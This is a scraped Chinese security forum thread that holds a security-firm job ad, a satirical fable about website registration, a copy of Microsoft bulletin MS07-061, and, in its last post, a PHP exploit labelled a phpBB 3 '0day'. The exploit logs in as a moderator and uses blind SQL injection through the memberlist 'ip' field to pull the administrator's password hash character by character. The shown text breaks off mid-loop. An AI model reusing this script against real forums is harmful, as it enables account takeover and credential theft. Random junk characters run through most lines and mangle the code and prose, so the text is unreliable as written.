最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 绿盟科技
  • 工作地点: 江苏
  • 专业要求: 其他 
  • 学历要求: 文盲
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.nsfocus.com
  • 简历邮箱: wangtuo@nsfocus.com
  • 联系电话: 114
  • 在线QQ: 10000
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++绿盟科技相关说明++++++++++

    招聘职位:WEB安全测试/安全研究攻城师
    & E& F6 c: f, v& a9 y人数:4人, y& v2 ~: e. n( z" c
    工作地点:杭州7 H- S- `' w7 s6 ?$ o& S& ?. D
    截止日期:2012年8月30日# W4 T1 ^2 q& m2 t; O+ X
    学历要求:本科或以上均可# f: C1 ^/ ?' z- ~. `; _
    岗位要求:
    - m9 J- {  ]2 e* u! ^1. 熟悉ASP/.NET/java/php等常见web代码;! @+ a* D  S+ n5 b
    2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;* _+ Z  b- a' {, ]
    3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;
    7 W" l2 P6 O) I5 k4 B8 h# Z% Y4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;
    2 H% y4 ~. _4 h, k0 _% d) O4 r2 b5. 2年以上web安全工作经验,对web安全测试有自己的理解;. W  B  E$ C& C- u' _% g/ r, H
    6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。
    $ Z) a, l; u$ W' {3 K; g: q! h具备以下相关条件者将优先考虑:
    ; i4 X' Z3 P0 S! u5 U0 X1.熟悉涉密信息系统以及相关技术要求;
    , m% p* H: Q3 s1 z6 Q$ `2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;
    1 l0 ]/ I) d* g6 `  u6 t! ?. X3.熟练使用Linux操作系统,了解内核安全机制;2 v1 k5 P/ {: h
    4.有内网渗透经验,擅于独立挖掘web安全漏洞;
    7 W5 X$ z4 p  v' ~3 i" i6 n5.对等级保护标准、评估流程等非常熟悉的优先;0 v$ C# r* r3 ^' }
    6.对cisco、ids、ips等有一定 研究;/ l  ^( [* s. `1 w* I
    7.一年以上信息安全工作经验;
    6 @: \& t# x' j- o1 ]1 Z8.具有网络、系统安全方面证书。( T1 N, V# D: N/ n* Z: d  \
    9.有一定的软件编程经验和逆向分析经验优先;
    2 j( W' {. M. ]% z8 h+ C1 B# O有兴趣请发简历到wangtuo@nsfocus.com
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    河蟹、蜘蛛和蜗牛的故事
      河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。

    1 `5 v  D- u4 w; s  j6 [
    人物:樱花浪子 BLOG地址:http://www.hacklu.net/

    + O4 ~9 ?. J: }/ Z5 P3 C; X* y& U( C$ c; R

    5 z9 G$ [2 Z* h6 ]) A$ b" ~+ f  b9 V9 q
    9 x# K) g' {0 m" H# [: n
    6 J  s- o( W5 @6 N* s* c9 P
    & ?5 o9 i6 X" `# ~( E! d$ H/ p

    ) K4 o6 b) d# m5 V! i2 \) @4 r* q" v  x( K5 D# E
      m  s& `" f0 V$ m: P

    : p+ @8 \) X3 i! ]& D' E, Y: U5 ]. [( G* e. H( [  e: m

    & @3 F8 ]8 u* R
    ; Q$ b; h/ [* s: o2 L% V' U. d$ x  k+ i. g1 O' Y0 A

    : G2 ^$ m9 n6 o( G! R/ W6 I5 X: u# T  U5 x! y
    4 ]$ _* G. x. p) B

    + N' d  X) u, B, l4 S2 K" I公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    已经证明:此贴有意思,而且非常有意思~  1 t  L8 d' S: _  @# q; Y- M* K
    ) K$ ^8 @- J+ S: {& D8 w2 K

    1 F3 n( ]! c; I1 g" M  V1 G$ W, M
    : O+ a5 z  ~: h6 j$ m9 J

    . \- l* M/ e8 K6 l" R8 O5 ~- U# h, `' G" }5 _) D* O2 |! y; u0 I

    ; s& R: @6 w" [4 G3 N2 p% W
    " ^9 ]6 @3 b, b/ [$ S: P) S) h/ Q" [7 E) U4 B" g( |

    ! Q, F9 Q7 y6 ?8 _2 n1 S
    ( Y6 D* g3 N+ _! \3 B
    ( k" i) r/ S6 I) K
    . C( f  ~$ @3 H. L( r
    ' R- i9 s5 }/ d$ Z! Y  ?2 ?4 s: j( c  d+ Z" R: d8 p

    ( g, z7 r9 p; Q" p8 J7 {
    ) M9 G2 u% T8 N; T$ C* u) O, t3 ~, X- K. p) A9 J
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MS07-061:Windows URI处理中的远程执行代码漏洞
    发布日期: 十一月 13, 2007版本: 1.0

    7 w0 S, }+ z7 O) ]. p
    摘要
    & k0 b6 p$ L0 O
    此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
    % o1 i6 J* Y( F/ a9 c
    建议。 Microsoft 建议用户立即应用此更新。
    4 W1 L4 S, h9 g7 L. K0 E0 [
    受影响的软件
    8 F2 P3 R; u8 L
    操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045

    - R: D. N; M! p9 n, }8 G
    不受影响的软件
    # Q4 U5 z; ~! r5 X* C* P
    操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64

    ! r' F6 B/ X$ V& e& s7 u
    微软的安全公告:
    , f7 V1 U  N! k6 l1 W7 w7 I1 ?" Y0 U
    http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx

    - {+ w) w+ D# B' ^
    (以上链接均连到第三方网站)
    & G6 O1 G6 z3 x9 w+ y
    # d! I; h3 ~' k9 d2 w

    8 m  \1 o$ g+ Z1 f# [3 i6 q; y! M5 r; m7 C: k: _8 g

    " _! W" [0 F& l  B, D5 r( M& [# Z) x/ t4 n: V7 ^2 }5 f

    $ V1 p' J- L" K9 E  S! T& F. D; {# @* b  C/ {) g3 J: f

    5 P% D9 N; ^: X! u9 _6 }
    1 p2 I1 |3 n' g& n; B
    3 W! U, s, p0 v1 G: G, k8 [( j% \1 @5 w1 w, c" @3 C6 J; L) ~+ `5 U

    ; X' X: v  E& z5 a5 G# Q4 Z3 q- q+ \  ?' S' Q/ o4 f
    7 c' }* j' f- v

    # P+ K+ A0 z! d7 ]9 N3 b; k1 ]1 ]6 x+ S: v
    ; U' H; ]+ y3 A2 x/ B

    ! j7 `2 v  j- m& P% U% e9 W  @公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    PHPBB 3.0 0day漏洞放出
    #!/usr/bin/php -q -d short_open_tag=on
    , V; V) K, ]# q7 ?<? ! u9 C) j9 S/ ~% E" z" K! S
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure
    . r3 d% m7 Y! Q/ e$ P( s0 ]"; 2 W9 E; m. {3 i7 j6 K
    echo "by Hackerz5 hackerz5x@yahoo.com
    ( C1 A" C( t* y3 H";
    4 f' n5 }/ d5 ~4 j/ S* ~: o8 L2 F7 ]; wecho "site: http://hackerz5.com4 a2 `9 y+ w* X; \& r2 g6 i3 Y" z
    ";
    ( Q9 g: @6 W. F, C, S# t  ~5 Oecho "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"" S% V0 E9 W( |& v( W4 J$ t
    1 K, s% m* ~7 i% T) H( L
    "; 7 b9 H0 n; w3 \
    /*
    7 F' }' T  B& \- `: Rworks regardless of php.ini settings 0 A! V  S* ]9 D& L" l+ f0 a7 \* w# A
    you need a global moderator account with "simple moderator" role , v! b0 U! Z3 i6 |4 ]9 G
    */
    , `% n  y9 w2 R% f3 o$ Nif ($argc<5) {
    2 ~, E1 C2 H! y- Cecho "Usage: php ".$argv[0]." host path user pass OPTIONS
    & ?! y) M! _6 B, y"; * Z2 X* U5 a$ L, b! \
    echo "host: target server (ip/hostname)8 c7 O/ q, x5 a
    "; - S, m% j8 h; u1 n) t
    echo "path: path to phpbb3
    " `1 Z9 z8 m2 Y' I/ r"; ; I1 z- v7 d! \; }
    echo "user/pass: u need a valid user account with global moderator rights* M2 M& D1 p- }6 u) k& p. H0 ?4 C
    "; 1 ]& q7 O+ C* H1 T
    echo "Options:
    3 B4 K  h1 l! X0 F: g"; ( ?6 n+ X& R" y+ F' l& {# M! V+ w* x2 u
    echo " -T[prefix] specify a table prefix different from default (phpbb_)
    + _7 P% ~% V2 j7 l8 `4 p"; 1 C; o* Z7 Y# X2 F% h9 v
    echo " -p[port]: specify a port other than 80
    ' Q' B  a( v; D# L+ X1 F4 x6 G* [% V";
    ( \: m- n9 p2 G# K  o+ y- @6 decho " -P[ip:port]: specify a proxy
    , h2 D- {  ^. E6 R* h- ~"; 1 f+ p  \3 Y7 y( h
    echo " -u[number]: specify a user id other than 2 (admin)0 {* J" Y' x/ r
    ";
    4 U! [1 w9 T& Q1 W4 I9 }: pecho " -x: disclose table prefix through error messages
    , O& h! L  W3 Y# p: w& L2 p9 a% u"; 9 U; S$ B5 M' ?2 x
    echo "Example:
    ! |) @, r! I2 b9 p9 L3 Y6 r";
    & Q& k0 G  k: ~* S& @echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
    0 A: ^5 q8 C3 y! ?"; ) V- P: }; K1 n. @9 V
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7
    , \& J6 `( b1 t8 l$ A";
    9 E' D" B4 U1 e1 C+ ]$ Q5 r& h( P  n' {die;
    ! A( }. U/ e1 k2 \! B}
    & q7 {' k3 H8 Q% Q5 a) Y. yerror_reporting(0);
    : Y# z' A, a8 o- q* r5 aini_set("max_execution_time",0);
    / P4 y0 p" S8 i% r5 O8 Xini_set("default_socket_timeout",5);
    8 C$ n# V& m! v+ Ofunction quick_dump($string)
    ! T  l$ K0 a$ v, r4 d- z2 Q{ ) M! z: {8 V$ y; d/ j
    $result='';$exa='';$cont=0;
    ' ~9 Y7 i! k6 [& p2 T, w! Z+ s6 rfor ($i=0; $i<=strlen($string)-1; $i++)
    6 t9 b$ ?# I5 U{
    5 r* E+ U8 E1 D" c. N) Fif ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) 6 u! S2 u0 K. i- b
    {$result.=" .";}
    - G5 k' ?" n2 welse 2 {2 X7 M( o8 r( ^" G
    {$result.=" ".$string[$i];}
    6 G4 B/ v# _2 i  {1 p. p. aif (strlen(dechex(ord($string[$i])))==2)
    1 N- y) {1 O& @! m2 B{$exa.=" ".dechex(ord($string[$i]));} 2 Y8 ~8 E+ f- A' q# ?- t
    else 7 v4 T4 Y/ j2 ^, l( a
    {$exa.=" 0".dechex(ord($string[$i]));}
    0 g% {+ l, _- ]; i$cont++;if ($cont==15) {$cont=0; $result.="7 ~- l0 h7 z- J2 i
    "; $exa.="+ P' E+ [, C) a* j( j
    ";}
    & `" z3 \7 F. d) f9 @) c- Z4 m} ) o/ C) E$ L, i0 G
    return $exa."& |* H; [, A  G5 b
    ".$result;
    / B# W, M8 W, r0 m5 M' v, ?}
    0 f' X8 {+ a2 n8 ^, h4 Y# g  f" v$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) '; / h! u8 G* \# W: n: ]
    function sendpacketii($packet)
    0 t" y' q: n! N7 d5 a% `{ ( W8 u& Y* I- X9 P, _. ~& ^
    global $proxy, $host, $port, $html, $proxy_regex; * P  U5 n% q4 ^$ ^
    if ($proxy=='') { ! C+ @8 l3 x7 v2 _7 b1 b, I
    $ock=fsockopen(gethostbyname($host),$port);
    " V# I) L$ k1 O+ M2 Xif (!$ock) {
    % m5 r$ b  k( N. }echo 'No response from '.$host.':'.$port; die;
    - j7 x/ M% i* i! D  B3 A2 n) d} 2 |% V* j4 }: `
    } 8 P1 z; o% c7 @" j$ T$ @
    else {
    ( M; \% O- J: f" t1 M$c = preg_match($proxy_regex,$proxy); 0 X( w* R! U% t7 A% n
    if (!$c) { / j& D+ D. T5 M3 S! H+ w
    echo 'Not a valid proxy...';die; ; U# p% M' L9 f/ D* A
    }
    1 i* ]8 I, ~9 x) B3 B/ J- I# G$parts=explode(':',$proxy); 0 [9 O2 Z. B% M; D
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...( ]& l3 J$ _  C. L$ r4 [2 F
    ";
    # x8 C: X. I, f( x6 M9 K) ^+ n$ock=fsockopen($parts[0],$parts[1]);
    7 y6 S$ \# z; O9 g2 V* n( D+ q) zif (!$ock) {
    9 ^2 R" a. ]9 P0 i( Xecho 'No response from proxy...';die; 9 a0 d7 h  x4 q) u& N% }/ p
    }
    1 p' {5 ?( r3 {' e2 }3 r5 w" [}
    5 t! T! _) n$ L  |fputs($ock,$packet); % e* g8 A% K5 u% g, O
    if ($proxy=='') {
    " g7 m1 X, }; d7 J+ w: f$html=''; ( b4 y1 K/ I3 \7 j+ X
    while (!feof($ock)) {
    6 |, O8 e: E# Z0 k6 k. X  a$html.=fgets($ock); ) [% P- N, o  I4 |- H
    }
    $ r/ l' ^2 R  C}
    $ g7 \% p* i* R4 Y  A/ q8 uelse {
    * q! H) H7 d& |8 T0 Y/ U/ B+ N$html='';
    1 J) E, [  x/ D" U3 Q8 Hwhile ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
    * M  y) w! K9 p# ]$html.=fread($ock,1); : Q5 W) X( I, ^3 _$ D
    }
    & d/ j- b5 T& A6 a}
    7 N1 p  e9 V$ d5 d, ]# r& W6 m3 Dfclose($ock); 6 f$ s: g; S7 Y6 N% J
    #debug 1 @6 r( Y# v+ k
    #echo "
    $ y3 F- c6 A. F+ z' q/ R1 C- t".$html; 0 u" h! r: b' K" Q, e) K; t# M
    }   t$ u# S# B! g& i  T! {
    $host=$argv[1];
    # c4 {9 H; j: s! @) J- ]$path=$argv[2];
    $ i) M& S3 Y: A3 |+ x8 k0 q$user=$argv[3]; # R8 ]2 O/ S8 A6 c( j9 P9 C# L
    $pass=$argv[4];
      U" ]& I" Q. b+ `0 _) H% q$port=80;
    - O0 M( S4 u2 |+ y5 |, [$prefix="PHPBB_"; " `0 M2 m8 H+ ]7 J+ w  X
    $user_id="2";//admin 4 _0 j. B& ~- R% p( L+ a4 }
    $discl=0; 6 w) V% Z* ]4 b
    $proxy=""; % p) \5 ]: h9 |2 n9 Q" @, o
    for ($i=3; $i<=$argc-1; $i++){ ' m3 g3 W" K2 P0 m3 l
    $temp=$argv[$i][0].$argv[$i][1]; 7 e/ }( q  g6 r; C* j" ]
    if ($temp=="-p")
    + r( \  `" @# r( v2 Y! r{
    8 a1 k. \- y- S( r$port=str_replace("-p","",$argv[$i]); 7 V( m4 L$ D$ U, c) d) n3 F
    }
    0 O: Y1 C$ w1 dif ($temp=="-P") & |' H% U) q2 q+ s8 M
    { 2 d* D% Z. j: T" T: w
    $proxy=str_replace("-P","",$argv[$i]); % m- I  A$ b5 h+ s  h
    } . K" L5 x' @. F  p" ?) w( C
    if ($temp=="-T")
    " o, `9 O1 C& T, t{ * W/ O2 h1 X# J) M8 Y* z3 w
    $prefix=str_replace("-T","",$argv[$i]);
    9 s8 Z* q" u# N! J  _}   d# {% o( |. N' x
    if ($temp=="-u") . r1 s5 k5 {9 R$ K" j
    {
    ! N* @' X( d0 Y2 V! d" V$user_id=str_replace("-u","",$argv[$i]);
    8 `2 V- S/ R# o" Y% I+ J% l} # @; ]. p$ T2 c" Y9 ?! c
    if ($temp=="-x")
    : U* S$ `7 C8 G* `2 B{ 3 j5 p) {' K% x3 n; I$ Z4 U, ~
    $discl=1;
    8 G# \3 n. @- Z4 a} * Z5 \# L+ g5 d, p' ?; a
    }
    ; |5 L: H0 ?3 I' |+ Jif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} * ]2 I( }8 H6 U$ Q. M$ B/ I( z
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    7 _/ R% Q( ^. d3 Q5 M, G0 t$data="username=".urlencode($user); 6 L2 e, Z" N' Y9 s$ ]  K
    $data.="&amp;password=".urlencode($pass); " N7 P1 ~1 N& F! j8 Y4 E
    $data.="&amp;redirect=index.php"; 7 Y! o3 \. t, [
    $data.="&amp;login=Login"; 5 r" `2 w; w5 C5 e+ W$ Q' B6 ^
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0
    . _4 n3 S* I1 ~3 q% A"; 3 G0 ]) p: g2 Y. G8 y! `# B
    $packet.="Referer: http://$host$path/ucp.php?mode=login
    ( a  @1 \7 E- F% q0 M";
    : Z$ E5 v  j' R3 J3 E, b( A8 d$packet.="Content-Type: application/x-www-form-urlencoded
    $ J3 X! g: {8 X$ D0 J: L";
    + E! g2 W  O$ \6 b4 n$packet.="Accept-Encoding: text/plain
    , ?( l. c* u) i0 P- V. V& \' m";
    * e0 p4 G: ~. z( i% T! I$packet.="Host: ".$host."4 h9 F4 T7 d! a- z
    ";
    / b" H' q1 [) R5 K$packet.="Content-Length: ".strlen($data)."
    . a3 V% P5 m1 U8 O, v6 {6 b";
    9 z2 k5 ~& u8 q' ^, F0 O7 [$packet.="Connection: Close# B6 K# c2 d% f* C+ l5 d( N% _
    0 l/ I4 x0 X+ f
    ";
    : g- w6 _7 n, h7 p$packet.=$data;
    ! k. [& p! U- e4 zsendpacketii($packet);
    , G& ?) ~0 ~( I% K/ H. ^, S$cookie=""; ' k  W9 P9 q( ]4 q7 q. G; }  A% O3 S$ L
    $temp=explode("Set-Cookie: ",$html); ( f5 Z) g& t& d5 ^# x
    for ($i=1; $i<=count($temp)-1; $i++)
    * P. {$ k) u; m2 _{ ; G9 ]* {! E' A3 E9 ~& S! j
    $temp2=explode(" ",$temp[$i]); . P  {2 K! q4 ?
    $cookie.=" ".$temp2[0]; % A+ M) U( e) M+ j
    } 5 p3 a' d9 O1 ?3 c/ S) Y5 e3 x
    if (eregi("_u=1;",$cookie)) $ M5 c. g3 o$ ~
    { / e6 ?7 M$ x! R7 H
    //echo $html."0 G. V1 R+ S: m
    ";//debug ' T# \, C1 `2 p( P% r
    //die("Unable to login..."); : }# R+ U5 O2 R' }- I) p
    } % z/ a8 D. Y! i& v9 [+ P- i
    echo "cookie -> ".$cookie."; m# |: B4 G& L% f8 Y
    ";
    2 {+ z& Z# Q. z  ^( bif ($discl) + Y; O0 x7 T$ S  M, C' R9 S$ Z+ w# Q/ Z1 y: b
    { 1 h* c- ~1 r* Q$ y8 d: H7 g
    $sql="'suntzuuuuu"; / W; u2 o$ z' c2 i$ x9 p" T4 [
    echo "sql -> ".$sql."
    ) w' ?. D. r" H' s7 m" z"; 0 D3 E( Z3 T) I- }2 Q; k) ^2 P
    $sql=urlencode(strtoupper($sql));
    ' q% O' S8 b) j  R5 D; Y5 t$data="username="; + U" y' i" Z7 ?, O, b9 E
    $data.="&amp;icq=";
    ' q8 k4 l1 e5 H( k* y* K0 S" c# E* ^$data.="&amp;email=";
    ) g0 `& O4 ~4 E6 x% J. O2 g9 l$data.="&amp;aim=";
    2 ]  k. L: a3 ^) q( w' a2 _2 Q4 n$data.="&amp;joined_select=lt"; # [& b' T( q" z' }2 Y( w
    $data.="&amp;joined=";
    : n# ]; b% Z2 z1 @7 J7 b; ~3 \$data.="&amp;yahoo="; 4 [& U' ^! q* O- Y+ k: Z
    $data.="&amp;active_select=lt";
      o2 ^* ~- d. ~, S/ i/ U$data.="&amp;active="; 5 _+ Q4 h2 O! N. o' R
    $data.="&amp;msn="; 1 S0 u# J4 o* l8 H( w$ e% S& X6 L
    $data.="&amp;count_select=eq"; 2 e* F4 U; [* H
    $data.="&amp;count=";
    6 I4 g9 a2 p1 O! A$data.="&amp;jabber=";
    , {! u) w) x' H$data.="&amp;sk=c"; ) w; q' V8 c: `0 S+ o3 l; e
    $data.="&amp;sd=a";
    ' s: x( J* r! T$data.="&amp;ip=".$sql;
    # F" S' s* v) ?- S4 q) A$data.="&amp;search_group_id=0";
    ! }, n# [/ I6 F* m$data.="&amp;submit=Search";
    5 \( p8 x. y8 \0 \$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    6 O6 c; v) K* I9 r/ w! p% c";
    + n% _% y2 x$ ?$packet.="Content-Type: application/x-www-form-urlencoded
    ) L5 M, c4 A1 H5 T* I";
    2 ~0 ?2 G! t% G6 r1 \6 Z) k/ `$packet.="Host: ".$host."
    / n7 h8 W' e2 n1 Y3 T$ m) G"; / I0 z8 F) ~8 ?8 l4 o, C5 q
    $packet.="Content-Length: ".strlen($data)."% w: l/ e# p! [4 y" D! q
    "; : ]% t  D) A/ O
    $packet.="Connection: Close
    . W( M4 [' x- ?";
    ' z' X9 A9 ]( l, B: g$packet.="Cookie: ".$cookie."
    0 ~' s' {4 r; u% N" d/ Z- t# b2 {3 k! }8 I5 r( [' i
    "; * q0 K3 S! ~9 l' h1 h/ y7 B
    $packet.=$data;   E& P. g2 h0 Y6 I2 p4 s7 L9 T; r
    sendpacketii($packet); ( U2 V* W$ q1 m
    if (strstr($html,"You have an error in your SQL syntax"))
    / J& j, `, i/ a! E{
    6 t, L8 e- ?+ a3 j! I$temp=explode("posts",$html);
    ! f5 [; m/ p# Z/ y; y! K! Z) V$temp2=explode(" ",$temp[0]); 4 @) D7 C$ T! r' c6 E  f
    $prefix=strtoupper($temp2[count($temp2)-1]);
    8 @+ R" y- s! A& @2 }echo "prefix -> ".$prefix."
    $ `2 d0 P- f. z  e- b" w";sleep(2); 7 q' \$ X1 }) q. k, D/ p4 b
    } ' p7 v$ b5 j; e0 o
    }
    & X' j+ u& K" E$md5s[0]=0;//null , w$ Q) j/ b  J3 D2 [' @2 C
    $md5s=array_merge($md5s,range(48,57)); //numbers 3 Q+ E$ M) P' t/ L! R, R5 `
    $md5s=array_merge($md5s,range(97,102));//a-f letters . e- R) r; B# Z$ k
    //print_r(array_values($md5s));
    4 i7 f: o7 P% _) G8 t$j=1;$password="";
    . i7 K& \; _/ N9 k8 k8 v2 U" z2 pwhile (!strstr($password,chr(0)))
    : H- g, X9 W$ @* a/ \/ ], w, h/ C{ , h7 }+ z: i  h5 u6 |) r3 l9 @
    for ($i=0; $i<=255; $i++)
    9 t' v: `3 z0 k+ p/ b/ q{
    4 ?% D& ]3 u* J* {# o* n) cif (in_array($i,$md5s))
    3 r/ |4 x/ q  j8 y{ " @' G/ H2 c+ q/ I( c" D
    $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; 4 o# ~1 R5 W; U- U1 ^1 N
    echo "sql -> ".$sql."
    - J" i! ~/ a* D5 G9 Q1 X7 K, ?+ P5 v" w";
    3 |- E- R. `8 Q) W* s" S4 I" A, t9 I$sql=urlencode(strtoupper($sql));
    8 q4 @9 L/ w( p9 t" c0 o$data="username=";
    ; }& j# m" I1 D" ?$data.="&amp;icq="; 0 L7 {7 b' u! }1 a# i- B! o' B
    $data.="&amp;email=";
    0 j6 b! y) U4 S' G! ~. }4 Y$data.="&amp;aim="; % d% @0 [; \: c# _* v6 H3 h
    $data.="&amp;joined_select=lt"; - }" S( j% N! p
    $data.="&amp;joined=";
    8 X" m( g1 N# G$data.="&amp;yahoo="; ; Z( t4 l8 M: ?. J& q1 K
    $data.="&amp;active_select=lt";
    * g5 s5 }" T( f, s; @$data.="&amp;active="; 6 X$ P4 b0 |, d) E
    $data.="&amp;msn=";
    . x" y+ \! |. q9 L5 c% g6 H3 B8 s+ y$data.="&amp;count_select=eq";
    1 d  g1 j5 q% q& L; S& n$data.="&amp;count="; 0 V$ |& S5 Y7 ]5 r5 ?) W
    $data.="&amp;jabber="; " I5 Q  {& Z5 _' C# e/ X/ F3 ~% Y
    $data.="&amp;sk=c";
    9 Z! e2 D' ]8 q$ n" r# S$data.="&amp;sd=a";
    $ Z7 E, L: b! \8 u9 p$data.="&amp;ip=".$sql; + ]  G. h) m) g' q* I
    $data.="&amp;search_group_id=0"; $ {5 n) J0 m* Q& R* _8 G
    $data.="&amp;submit=Search";
    : q+ a# r$ A1 o$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    & {! e+ f3 ?1 [8 Z( c7 @"; , I# T+ y1 A- {2 K+ Z
    $packet.="Content-Type: application/x-www-form-urlencoded  v: {% E8 E; ~4 G
    ";
    6 ~) y, A  I1 R! O- E. m8 ?* x$packet.="Host: ".$host."
    - o$ d& G% z+ L% i, ]4 Z" L"; & M8 s% F" b* ]; k1 ^5 X+ r
    $packet.="Content-Length: ".strlen($data)."+ e: G9 E- M, B3 j
    ";
    6 p: o7 u. t+ ?! I0 b0 I, @$packet.="Connection: Close2 z3 @) _0 @! {# }8 P! o
    ";
    8 w1 _8 b: R/ W( g0 j$packet.="Cookie: ".$cookie."
    + E5 r3 q" x0 R
    $ }6 ]1 b% u, T% W4 n";
    9 x0 e/ N: Q- Y9 q3 w8 E9 Y8 r: d7 }$packet.=$data;
    1 A6 E( e. E2 Z2 N. l) R2 h2 l3 Lsendpacketii($packet);
    ( ]( k9 h) }% q/ Uif (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]
    , y( O+ P& b( q0 R( X";sleep(2);break;} $ ]: g1 B4 _4 o6 b, {. O
    } * O5 [1 ]! \# a7 O0 M' k
    if ($i==255) {die("Exploit failed...");}
    ) n3 X: w; x) S$ o}
    9 j, J& x) q8 N% J6 L4 E- x$j++;
    ( D$ O3 y( }/ G! j}   q  P; Y& M; B$ _$ ~: Z" x
    $j=1;$admin=""; ' F7 _' {  S+ Y+ P( p/ W6 v2 x
    while (!strstr($admin,chr(0))) - ?* [' I( A, T" i; b
    {
